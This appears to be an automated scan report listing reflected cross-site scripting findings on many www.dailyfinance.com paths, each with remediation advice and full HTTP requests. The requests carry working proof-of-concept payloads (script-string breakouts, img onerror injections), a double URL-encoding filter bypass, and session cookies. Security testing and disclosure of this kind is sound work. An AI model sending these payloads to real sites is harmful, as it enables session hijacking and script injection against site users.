The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dedd%2522%253b4a063b10e17 was submitted in the REST URL parameter 2. This input was echoed as 4dedd";4a063b10e17 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/media4dedd%2522%253b4a063b10e17/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.327. http://www.dailyfinance.com/category/media/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/media/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fd93"-alert(1)-"8ccc6e31a33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/media/?2fd93"-alert(1)-"8ccc6e31a33=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bbb5%2522%253b4d1d44cb5cb was submitted in the REST URL parameter 2. This input was echoed as 2bbb5";4d1d44cb5cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/real-estate2bbb5%2522%253b4d1d44cb5cb/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3815c"><img%20src%3da%20onerror%3dalert(1)>f26efbc5c30 was submitted in the REST URL parameter 2. This input was echoed as 3815c"><img src=a onerror=alert(1)>f26efbc5c30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/real-estate3815c"><img%20src%3da%20onerror%3dalert(1)>f26efbc5c30/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Real Estate3815c"><img Src=a Onerror=alert(1)>f26efbc5c30" /> ...[SNIP]...
1.330. http://www.dailyfinance.com/category/real-estate/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/real-estate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e4d4"-alert(1)-"9461b2061e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/real-estate/?6e4d4"-alert(1)-"9461b2061e1=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c2c7%2522%253b9a37d7649dc was submitted in the REST URL parameter 2. This input was echoed as 3c2c7";9a37d7649dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/special-report3c2c7%2522%253b9a37d7649dc/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9b2"><img%20src%3da%20onerror%3dalert(1)>c8b45655a6d was submitted in the REST URL parameter 2. This input was echoed as 5b9b2"><img src=a onerror=alert(1)>c8b45655a6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/special-report5b9b2"><img%20src%3da%20onerror%3dalert(1)>c8b45655a6d/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Special Report5b9b2"><img Src=a Onerror=alert(1)>c8b45655a6d" /> ...[SNIP]...
1.333. http://www.dailyfinance.com/category/special-report/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/special-report/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc907"-alert(1)-"0e20d905d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/special-report/?fc907"-alert(1)-"0e20d905d48=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2aac"><img%20src%3da%20onerror%3dalert(1)>3f45b070d75 was submitted in the REST URL parameter 2. This input was echoed as e2aac"><img src=a onerror=alert(1)>3f45b070d75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /category/streetwisee2aac"><img%20src%3da%20onerror%3dalert(1)>3f45b070d75 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77060%2522%253b3b7e990b527 was submitted in the REST URL parameter 2. This input was echoed as 77060";3b7e990b527 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/streetwise77060%2522%253b3b7e990b527 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c952"><img%20src%3da%20onerror%3dalert(1)>4d39c3d6f77 was submitted in the REST URL parameter 2. This input was echoed as 3c952"><img src=a onerror=alert(1)>4d39c3d6f77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/technology3c952"><img%20src%3da%20onerror%3dalert(1)>4d39c3d6f77/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd6b1%2522%253bd22c82341f6 was submitted in the REST URL parameter 2. This input was echoed as bd6b1";d22c82341f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/technologybd6b1%2522%253bd22c82341f6/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.338. http://www.dailyfinance.com/category/technology/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/technology/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f163"-alert(1)-"51fc313d1f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/technology/?6f163"-alert(1)-"51fc313d1f7=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9%2522%253bbd8cd48cb3a was submitted in the REST URL parameter 2. This input was echoed as b9ba9";bd8cd48cb3a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/videob9ba9%2522%253bbd8cd48cb3a/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65ec"><img%20src%3da%20onerror%3dalert(1)>1ad79d1c918 was submitted in the REST URL parameter 2. This input was echoed as f65ec"><img src=a onerror=alert(1)>1ad79d1c918 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/videof65ec"><img%20src%3da%20onerror%3dalert(1)>1ad79d1c918/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Videof65ec"><img Src=a Onerror=alert(1)>1ad79d1c918" /> ...[SNIP]...
1.341. http://www.dailyfinance.com/category/video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/category/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b09d3"-alert(1)-"bf591ebbfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/video/?b09d3"-alert(1)-"bf591ebbfe=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.342. http://www.dailyfinance.com/help/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/help/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9540e"-alert(1)-"43e7c07bfb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help/?9540e"-alert(1)-"43e7c07bfb4=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.343. http://www.dailyfinance.com/historical-stock-prices/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/historical-stock-prices/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4cdb"-alert(1)-"c1b9b129a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /historical-stock-prices/?b4cdb"-alert(1)-"c1b9b129a35=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.344. http://www.dailyfinance.com/market-news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/market-news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96d90"-alert(1)-"ebe0fa8028d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/?96d90"-alert(1)-"ebe0fa8028d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.345. http://www.dailyfinance.com/market-news/bonds/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/market-news/bonds/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0f1"-alert(1)-"f0d21ded1cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/bonds/?ac0f1"-alert(1)-"f0d21ded1cc=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.346. http://www.dailyfinance.com/market-news/currencies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/market-news/currencies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c5d"-alert(1)-"2972ce4d413 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
